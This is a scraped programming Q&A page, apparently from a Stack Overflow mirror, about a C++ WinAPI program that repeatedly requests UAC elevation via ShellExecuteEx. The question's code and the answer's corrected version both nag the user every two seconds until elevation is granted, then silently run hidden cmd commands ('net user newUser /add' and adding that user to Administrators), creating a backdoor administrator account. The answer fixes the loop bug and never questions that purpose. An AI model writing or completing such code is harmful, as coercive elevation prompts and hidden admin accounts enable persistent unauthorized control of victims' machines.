CODEWITHSUNDEEP
c++winapivisual-c++
play12
play12

Reputation: 37

shellexecute with administrator privileges doesn't end

I'm trying to request administrator privileges every 2 seconds but I have a problem synchronizing the two processes. The process created by ShellExecuteExA does not end unless you manually kill it. The primary process (the main function) ends with ExitProcess and now it is the shellexecute process that is running, that returns to the main and gets stuck in the ask function, asking again to raise privileges when it should not enter this function. I am using vs2019.

#include <iostream>
#include <Windows.h>
#include <WinUser.h>
#include <string>
#include <sstream>

using namespace std;

#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Shell32.lib")
#pragma comment(lib, "Advapi32.lib")

bool CheckIfAdmin()
{
    BOOL RunAdmin = FALSE;
    HANDLE hToken = NULL;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
    {
        TOKEN_ELEVATION Elevation;
        DWORD cbSize = sizeof(TOKEN_ELEVATION);
        if (GetTokenInformation(hToken, TokenElevation,
                                &Elevation, sizeof(Elevation), &cbSize))
        {
            RunAdmin = Elevation.TokenIsElevated;
        }
    }
    // Cleanup
    if (hToken)
    {
        CloseHandle(hToken);
    }
    return RunAdmin;
}

bool Elevate()
{
    char PathProg[MAX_PATH];
    if (GetModuleFileNameA(NULL, PathProg, MAX_PATH))
    {
        SHELLEXECUTEINFOA SEIA = {sizeof(SEIA)};
        SEIA.lpVerb = "runas";
        SEIA.lpFile = PathProg;
        SEIA.hwnd = NULL;
        SEIA.nShow = SW_NORMAL;

        if (!ShellExecuteExA(&SEIA))
        {
            DWORD dwErr = GetLastError();
            if (dwErr == ERROR_CANCELLED)
            {
                // reject UAC
                return false;
            }
            return false;
        }
        // accept UAC
        return true;
    }
    return false;
}
void execute_cmd(const char *m, INT opt)
{
    std::ostringstream os;
    os << "/c " << m;
    ShellExecuteA(NULL, "open", "cmd", os.str().c_str(), NULL, opt);
}

bool run_uac()
{
    if (!CheckIfAdmin())
    {
        if (Elevate())
        {
            return true;
        }
    }
    return false;
}

void ask()
{
    while (true)
    {
        switch (MessageBox(0, L"Elevated privileges?", L"", MB_OKCANCEL | MB_ICONERROR | MB_TOPMOST))
        {
        case IDOK:
            if (run_uac())
            {
                // Now there are two processes running
                ExitProcess(0); // exit from primary process
            }
        }
        Sleep(2000);
    }
}

int main()
{

    MessageBoxA(NULL, " main()", "!", MB_OK | MB_ICONWARNING);
    ask();

    // execute any action with privileges
    execute_cmd("net user newUser /add", SW_HIDE);
    execute_cmd("net localgroup Administrators newUser /add", SW_HIDE);


    return 0;
}

Upvotes: 1

Views: 818

Answers (1)

Remy Lebeau
Remy Lebeau

Reputation: 595319

Calling ask() if you are running elevated gets you stuck in an endless MessageBox+Sleep loop, because run_uac() returns false when CheckIfAdmin() returns true. So, move the elevation check into main() itself and skip the elevation prompt if already running elevated.

#include <Windows.h>
#include <iostream>
#include <string>
#include <sstream>
using namespace std;

#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Shell32.lib")
#pragma comment(lib, "Advapi32.lib")

bool IsElevated()
{
    bool bElevated = false;
    HANDLE hToken = NULL;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
    {
        TOKEN_ELEVATION Elevation;
        DWORD cbSize = sizeof(TOKEN_ELEVATION);

        if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize))
        {
            bElevated = Elevation.TokenIsElevated;
        }

        // Cleanup
        CloseHandle(hToken);
    }

    return bElevated;
}

bool Elevate()
{
    char PathProg[MAX_PATH];

    if (GetModuleFileNameA(NULL, PathProg, MAX_PATH))
    {
        SHELLEXECUTEINFOA SEIA = {sizeof(SEIA)};
        SEIA.lpVerb = "runas";
        SEIA.lpFile = PathProg;
        SEIA.hwnd = NULL;
        SEIA.nShow = SW_NORMAL;

        return ShellExecuteExA(&SEIA);
    }

    return false;
}

void execute_cmd(const char *m, int opt)
{
    std::ostringstream os;
    os << "/c " << m;
    ShellExecuteA(NULL, "open", "cmd", os.str().c_str(), NULL, opt);
}

void AskToElevate()
{
    while (true)
    {
        if (MessageBox(0, L"Elevated privileges?", L"", MB_OKCANCEL | MB_ICONQUESTION | MB_TOPMOST) == IDOK)
        {
            if (Elevate())
            {
                // Now there are two processes running
                ExitProcess(0); // exit from primary process
            }
        }
        Sleep(2000);
    }
}

int main()
{
    MessageBoxA(NULL, " main()", "!", MB_OK | MB_ICONWARNING);

    if (!IsElevated())
    {
        AskToElevate();
    }

    // execute any action with privileges
    execute_cmd("net user newUser /add", SW_HIDE);
    execute_cmd("net localgroup Administrators newUser /add", SW_HIDE);

    return 0;
}

Upvotes: 3

Related Questions